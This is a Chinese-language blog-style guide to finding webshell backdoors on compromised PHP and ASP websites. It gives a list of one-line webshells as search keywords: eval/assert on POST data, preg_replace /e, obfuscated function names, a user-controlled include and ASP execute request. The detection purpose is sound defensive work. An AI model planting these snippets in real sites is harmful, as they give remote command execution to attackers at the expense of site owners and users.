很多人网站很久之前就被挂马,如何快速找出木马并删掉后门呢?
很多人网站很久之前就被挂马,如何快速找出木马并删掉后门呢?很多人一个个的目录去查找,那个真的是小白做法,其实对于PHP一句话木马后门这些事可以通过关键字查杀的。不要觉着我没事研究这个做什么!其实就是告诉你搜索这些代码,如果搜索到了,说明恭喜你,你网站中招了!如何知道开发程序的人有不有在你网站留后门,搜索下这些代码就知道啦!
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
2、
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
5、include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
6、典型一句话
程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval_r($_POST[c]);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话
php木马如何查找:
历史回顾:
ver 1.0 <?PHP eval($_POST[w]);?>
ver 1.1 <?PHP @eval($_POST[w]);?>
ver 1.2 <?PHP eval(@base64_decode($_POST[w]));?>
ver 2.0 <?PHP include ‘xxoo.jpg’ ;?>
ver 2.0.1 <?PHP require_once ‘xxoo.jpg’ ;?>
ver 2.0.* <?PHP ****** ‘xxoo.jpg’ ;?>
ver 3.0 <?PHP @$_POST[f]($_POST[w]);?>
ver 3.0.* <?PHP $a=@$_POST[f];$b=$_POST[w];……..?>
ver *.* <?PHP /*UNKNOWN*/?>
有不明白的联系我啦!如果你网站是ASP,那么就搜索如下代码:代码:
ASP一句话木马
<%execute request("value")%>
<%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
如果发现上述代码,就说明你的网站已经被别人控制了。尽快的解决问题吧。